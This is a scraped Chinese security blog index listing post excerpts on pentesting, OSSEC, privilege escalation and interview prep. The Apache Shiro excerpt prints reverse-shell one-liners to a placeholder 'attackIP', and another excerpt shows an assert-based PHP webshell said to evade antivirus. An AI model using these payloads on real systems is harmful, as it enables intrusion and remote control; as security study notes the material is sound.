自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(48)
  • 收藏
  • 关注

转载 web面试指南

介绍一下自认为有趣的挖洞经历(或CTF经历) 你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? 你平时使用哪些工具?以及对应工具的特点? 如果遇到waf的情况下如何进行sql注入/上传Webshell怎么做?请写出曾经绕过WAF的经过(SQLi,XSS,上传漏洞选一) 参考以下三篇 我的WafBypass之道(SQL注入篇) 我的WafBypass之道(Upload篇) 我的WafBypass之道(Misc篇) ..

2021-02-19 12:53:16 1094 1

原创 安卓应用8.0以上模拟器支持测试办法

首先介绍个模拟器,名叫Genymotion,这个最高可以支持安卓10版本的模拟器。具体的安装介绍可以自己百度,非常简单,这里就不赘述了。本篇博客主要讲点干货。首先,连接ADB:在Genymotion中要连接ADB首先要使用自定义的SDK,可以在如下连接中下载:https://android-sdk.en.softonic.com/下载完解压出来后,进入设置:然后设置好路径:下面说没有包含,不用管,直接使用Genymotion目录中tools文件夹内的adb跑命令:

2020-12-15 15:36:30 6030

转载 root下安卓7以上添加系统信任证书

偷个懒直接复制连接添加证书具体步骤https://zhuanlan.zhihu.com/p/259255855另外附上多开夜神模拟器adb连接https://blog.csdn.net/weixin_45480533/article/details/104995461

2020-10-19 23:49:31 2924

原创 OSSEC功能进阶学习——OSSEC+ELK联动

decoder和rules学习参考链接:https://www.freebuf.com/articles/system/6157.html以及大大的新书:互联网安全建设从0到1首先第一个坑!需要修改的decoder.xml是在/var/ossec/etc这个路径下的。。。ossec-logtest是/var/ossec/bin这个路径下的。。。第二个坑,如下设置后,logtest依旧无法按照decode正常解析内容:<decoder name="logtest">&l

2020-08-11 12:48:30 726

原创 Ossec踩坑记录

1.搭建OSSEC参考教程https://www.cnblogs.com/zlslch/p/8512757.html2.踩坑记录笔者装的是目前最新的3.6.0版本,但是make不支持mysql,一直报错:make: *** 没有规则可以创建目标“setdb”。 停止。查阅文档发现从3.0.0版本开始,编译方式不一样。后来在github的iusse找到解决方案#before compiling, input "DATABASE=mysql" in you bash command lin

2020-08-07 19:26:26 805

原创 使用burp插件自动更新JS中的hash签名

这次测试遇到了些问题,踩了一些坑,为后来者记。 本次测试遇到的主要问题是服务端要验证sign值,sign值由sha1(salt+post data)生成,我如果要更改post data进行测试的话,就必须更新sign值。所以就编写了一个burp小插件自动更新。在插件编写完成后,发现存在中文乱码导致hash值生成错误,这个问题问了小伙伴也没有好的办法,最后灵光一现解决了,如下为解决办法:将burp编码设置为utf-8,很多教程只简单地叫更改字体然后在插件代码中将b...

2020-06-30 13:32:25 2215

转载 Apache shiro1.2.4 Getshell

方法一利用JRMPClient反弹shell方式Bash:bash -i >& /dev/tcp/attackIP/7777 0>&1/bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&10<&196;exec 196<>/dev/tcp/attackIP/7777; sh <&196 >&196 2>&196P

2020-06-16 19:29:02 724

转载 AWS认证攻略 – E哥的AWS Solution Architecture Associate 认证攻略

AWS认证介绍AWS Certified Solutions Architect 系列认证是亚马逊从2013年开始推出的对云计算架构师能力的官方认证。考试不仅考察应试者对AWS相关云服务的熟悉程度,题目也多来源于实际中要解决的问题,要求应试者有全面的架构设计经验和积累,所以含金量很高。在美国招聘网站glassdoor上,AWS solution architect的身价平均在10万美金以上,可见...

2020-04-08 15:07:43 5340

转载 Django用户登录与注册系统

https://blog.csdn.net/laikaikai/article/details/80563387

2020-03-26 17:46:40 298

原创 如何解决selenium与firefox版本不匹配的问题

在做wechat爬虫时遇到的问题,整理记录下:1.selenium与firefox版本不匹配:报错为 :selenium.common.exceptions.WebDriverException: Message: Can't load the profile. Profile Dir: /tmp/tmpazh15s If you specified a log_file in the...

2020-03-10 11:10:08 842

转载 Linux 提权的各种姿势总结

这篇讲一些关于 Linux 提权的方法,也是参考网上的一些提权方式,对于刚接触 Linux 提权的伙伴来说,需要花不少时间去理解,所以这里是以个人通俗易懂的思路去写,希望能帮到热爱学习的朋友,先写这些提权方法。若有更好的提权方式,欢迎老哥们在评论里补充一下。提权可能需要反弹 bash ,因为脚本语言无法形成管道,需要创造一个管道才能进行后续的操作,比如溢出成功之后返回一个 root 权限的 s...

2020-02-21 16:38:06 3701

转载 适用于渗透测试不同阶段的工具收集整理

Red Teaming / Adversary Simulation Toolkit内容侦察 武器化 交货 命令与控制 横向运动 建立立足点 升级特权 数据泄露 杂项 参考侦察主动情报收集EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识别默认凭据。。https://github.com/ChrisTruncer/EyeWitne...

2020-02-05 14:20:43 3086

原创 备战OSCP——缓冲区溢出实战(一)

如题所示,为了备战OSCP的缓冲区溢出,特开新篇。本系列所有的例子均可以在git上找到,链接为:https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice本次所用的是第一个例子,brainpan.exe.没记错的话应该是出自vulnbox。首先第一步,验证程序,使用od打开brainp...

2019-05-23 13:37:26 2633

原创 安卓安全——读书笔记

想到什么就随手写点吧,最近刚看完《Android软件安全与逆向分析》。另外还有一本《Android应用安全防护和逆向分析》,准备开始看。两本书的PDF链接我会放在末尾,需要的自取。《Android软件安全与逆向分析》书中提到了多种去除Android本地限制的方法,倾向于基础性的安卓破解,比如去内购(不过本书的内购都是围绕着google play来讲的,和国内的内购相差很大,国内的话更...

2019-05-01 14:49:10 658

转载 史上最强内网渗透知识点总结

https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&amp;mid=2247487491&amp;idx=1&amp;sn=270336c6cca79b4a4e5d777d41ce71b7&amp;chksm=ec1e202bdb69a93dba0f48f973132958c95d86b2db2b6d70b8ddd1cbe41c187fa08ca4c...

2019-01-13 22:33:14 7070

原创 SQL注入与防御研究(一)

本文持续更新。为SQL注入攻击与防御第二版读后感第一章SQL注入产生过程:1.字符处理不当       '作为分界线。2.类型处理不当       数字型,没加单引号,直接可继续执行命令。 LOAD_FILE, SELECT INTO OUTFILE3.查询语句组装不当       $SQL = "SELECT". $_GET["column1"]. ",". $_...

2019-01-13 22:32:56 633

转载 应急排查手册

雷锋网按:本文作者sm0nk@猎户攻防实验室,雷锋网宅客频道授权转载,先知技术社区拥有全部内容版权。媒体或商业转载必须获得授权,违者必追究法律责任。1 事件分类常见的安全事件:Web入侵:挂马、篡改、Webshell系统入侵:系统异常、RDP爆破、SSH爆破、主机漏洞病毒木马:远控、后门、勒索软件信息泄漏:拖裤、数据库登录(弱口令)网络流量:频繁发包、批量请求、DDOS...

2018-10-16 17:12:07 1674

原创 ELK配置踩坑指南(持续更新)

为什么要去认识了解ELK,这里先买个坑,后面有空了再来写2018/10/10      ELK首先,切记不要直接用yum或者apt安装,这是第一个坑。虽然这里很方便,但是受限于各源的不同,导致ELK各版本老旧,很容易出其他问题。比如一开始我用yum安装的kibana(阿里云的源),版本过低,很多功能没有。然后logstash直接没有grok插件,要自己装。这也很麻烦,所以推荐做法是官网下载...

2018-10-10 11:19:06 408

转载 内网备忘录(超级全)

作者:tom0li文章内容没谈snmp利用,可以去乌云等社区获取,没有后续内网持久化,日志处理,bypass uac等内容。Webshell测试主站,搜wooyun历史洞未发现历史洞,github,svn,目录扫描未发现敏感信息,无域传送,端口只开了80端口,找到后台地址,想爆破后台,验证码后台验证,一次性,用ocr识别,找账号,通过google,baidu,bing等搜索,相关邮箱...

2018-08-06 13:09:39 2143

原创 互联网企业安全高级指南读书笔记(3)

第八章 入侵感知体系主机入侵检测1.开源:OSSECMIG:救火利器OSquery:有一定IDC规模,有一定安全开发能力,对入侵检测有基于大数据理解的公司2.自研:架构设计:            行业法规需求            基础安全需求            企业自身的特殊安全风险需求            运维体系\网络环境适应Agent功能模块:            基线安全   ...

2018-05-07 22:05:14 299

原创 应急响应基础笔记

应急响应笔记基础知识Linux操作系统基础一些常见的命令必须熟悉:ls怎么按照时间排序列出当前目录文件?        ls实现列文件按时间排序        1) ls -lt  时间最近的在前面        2) ls -ltr 时间从前到后stat命令是干嘛的?        显示文件详细信息,访问时间、内容修改时间、状态修改时间lsof的作用是什么?lsof每一列分别代表什么?     ...

2018-04-26 17:24:49 1178

原创 php一句话木马的老生常谈,可过D盾,安全狗

首发T00ls,原文地址https://www.t00ls.net/thread-45367-1-1.html这边也是才进t00ls,算是一个小小的分享吧。首先是过安全狗,这里讲下怎么一步步过安全狗。首先下面这个马很简单,只用了一个变量覆盖,所以,不出所料被杀了        $b=$_POST['x'];        $a='b';        @assert($$a); 马被杀了那肯定要想...

2018-04-19 10:38:42 5649

原创 互联网企业安全高级指南读书笔记(2)

第一版读书笔记的内容太多,方式不行,严重影响看书效率,第二版 重新写。第七章网络安全网络入侵检测传统NIDS出口处部署,可以在1day披露的时候做虚拟补丁用NIDS可以为字眼NIDS争取时间。开源SNORT全流量NIDSIDC规模决定NIDS架构。D还是P对于门槛而言,发现远低于保护。厂商而言提供一个可以解决问题的平台,更重要的是能自定义规则,支持一种脚本语言,让甲方能够专注与自身核心业务安全。(...

2018-04-10 22:40:46 311

原创 互联网企业安全高级指南读书笔记(1)

前五章理论性质太强,故暂时快速跳过不进行记录,最后再总结性的重顾。此处直接从第六章开始。第六章 基础安全措施6.1安全域划分。统一安全等级主机统一划分,设置相同的网络边界,在边界执行最小权限开放对其他安全域的网络访问控制策略。传统安全域划分会分出DMZ和内网,通过硬件防火墙的不同端口实现隔离,但不适用于大规模生产网络,更多适用于办公网络。大型生产环境安全域划分则是把不同的业务(垂直纵向)以及分层的...

2018-04-09 21:20:16 442

转载 从面试题中学Web安全

转载自90sec根据 Github 上的面经总结的一些安全岗面试的基础知识,这些基础知识不仅要牢记,而且要熟练操作,分享给大家,共勉。如果有漏掉的大家可以留言或是联系作者补充,谢谢。1.对Web安全的理解我觉得 Web 安全首先得懂 Web、第三方内容、Web 前端框架、Web 服务器语言、Web 开发框架、Web 应用、Web容器、存储、操作系统等这些都要了解,然后较为常见且危害较大的,SQL ...

2018-03-22 13:07:20 6009

原创 随便写写,怕自己忘了(二)

这段时间遇到比较好玩的,大概提几点吧,怕自己忘了。上传文件,能任意上传,但是解释失败,报错编译失败?过滤找到规则,是检验文件头。这个时候,把图片马除文件头以外的内容全删除,有奇效。getshell这是一个大型系统的通杀。自己体会领悟吧对了,再提一点,有些时候报错,不是因为你马有问题,可能是你做昏头了,忘了是linux还是win,cmd=ls,win能不报错吗?再说个应急响应的。刚亲眼见证大佬20分...

2018-03-13 16:38:43 313

原创 安卓逆向基础学习

才开始学习安卓逆向,从java到dex再到smali,一步一步认识,学习,了解看懂smali语法。首先目前网上的学习教程都是从游戏破解开始。游戏破解第一去内购。我们可以用android studio 的monitor来进行查看logcat,以此来定位敏感词然后用Android killer全局搜索敏感词,例如“支付失败,支付成功”等。然后找到相关函数,类似onsuccess/paysuccess等...

2018-03-06 12:00:25 2102 1

转载 Win提权思路,方法,工具(小总结)

介绍windows提权总是被归结为适当的枚举。但要完成适当的枚举,你需要知道要检查和查找的内容。这通常需要伴随着经验的丰富而对系统非常熟悉。起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常的东西,而哪些不是正常的东西。最终变得更容易,因为你知道要寻找什么了,而不是挖掘希望在干草堆中找到那根针的所有东西。希望本指南能为你的入门提供良好的基础知识。所以本指南主要集中在枚举方...

2018-02-26 11:31:01 2285

转载 应急响应

1、cat /etc/passwd 未发现陌生用户和可疑root权限用户。2、netstat -anp 查看所有进程及pid号,未发现异常连接。3、last 查看最近登录用户,未发现异常4、cat /etc/profile 查看系统环境变量,未发现异常5、ls -al /etc/rc.d/rc3.d ,查看当前级别下开机启动程序,未见异常(有一些脸生,只好利用搜索引

2018-01-17 17:07:58 453

转载 对WordPress网站进行渗透测试 – 详解

WordPress是一个专注于PHP和MySQL的免费在线开源内容托管系统。这是一个功能强大且使用最多的博客工具。由于WordPress使用过程中出现了太多的错误,所以需要提高安全性。WordPress渗透测试对于发现漏洞并保护您的WordPress博客非常重要。安全研究人员丹尼尔·西德说,在2016年,至少有15769个甚至更多的WordPress网站已经被入侵。根据Su

2018-01-13 23:20:44 5174

转载 MySQL暴错注入方法整理

1、通过floor暴错/*数据库版本*/http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1)

2018-01-09 17:10:47 655

转载 ElasticSearch未授权访问的检测与利用思路

基本说明VulBOXhttps://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html延伸阅读https://www.ichunqiu.com/course/1413Redis未授权访问其他 NoSQL未授权访问MongoDB、Redis

2017-12-29 15:17:42 9490

转载 从零开始内网渗透学习

柠檬的内网合集,第二次看,感觉就不一样了。。。虽然我们同届,但感觉相差甚远啊,努力努力。Team:Syclover Author:L3m0n Email:[email protected][TOC]###域环境搭建 准备: DC: win2008 DM: win2003 DM: winxpwin2008(域控) 1、修改计算机名: 2、配置固定ip

2017-12-26 17:40:24 9711

转载 端口渗透总结

总是会忘这些东西,记下来,当工具吧服务默认端口公认端口(Well Known Ports):0-1023,他们紧密绑定了一些服务;注册端口(Registered Ports):1024-49151,他们松散的绑定了一些服务;动态/私有:49152-65535,不为服务分配这些端口;文件共享服务端口渗透FTP服务FTP服务:ftp服务我分为两种

2017-12-26 17:30:32 6257

原创 随便写写,怕自己忘了(一)

遇到file=_______或者home=________之类的出现在网址里,看看源码,有可能在源码里会有展示,这个时候可能有xss当然了,任意网站的跳转也是有的,这个看运气,爱笑的人说不定,http不行https就成功访问了?其实我觉得如果能访问内网,那就更好玩了,毕竟这是SSRF的时代[手动滑稽脸]然后嘛,今天碰巧看到,js调用,在数据没问题的情况下,你在burp没

2017-12-26 17:01:53 210

转载 smb(ms17-010)远程命令执行之msf

本次用到的环境:kali(2016.2)32位系统.ip地址:192.168.1.104目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105具体的步骤如下:kali系统下安装wine32:apt-get install wine32   用wine32执行cmd.exewine cmd.

2017-12-14 11:13:10 4668

原创 某活动技术点总结

因为特殊原因,所以只记录心得技术点,看不懂就别看了。情报就是一切。这句话真的是让我觉得汗颜无比啊。开场别人已经拿shell了,我还摸不着北。nmap没毛病,结果别人jboss拿的shell。这个地方记住,关键IP要-p-,扫描全端口,不能放过。弱口令要检查上传点,上传点要多发掘,如果一个不能绕过就要去尝试另外的,把链接都点一下,万一就有隐藏的上传点。x站其实难度都不大,就是

2017-12-04 22:53:44 210

原创 犀利的 oracle 注入技术

原来一直不知道oracle注入可以你拿shell,特意记录下以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成  /xxx.jsp?id=1 and '1'  的形式即可。(用" 'a'|| "是为了让语句返回true值)  语句有点长,可能要用post提交。  以下是

2017-11-27 14:56:25 1011

转载 sqlmap一力破十会

因自身需要转载,当工具书使用:转载自http://www.cnblogs.com/r00tuser/p/7252796.html前言在早之前我对于tamper的使用一直都是停留在错误的思维。想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用。直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无脑堆叠tamper,只要能够过就行了。

2017-11-08 09:20:08 1178

转载 Scanners Box

转载自:https://github.com/We5ter/Scanners-BoxScanners Box是一个集合github平台上的安全行业从业者自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器,同时该仓库只收录各位网友自己编写的一般性开源扫描器,类似nmap、w3af等知名扫描工具不收录。子域

2017-11-06 17:29:21 816

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除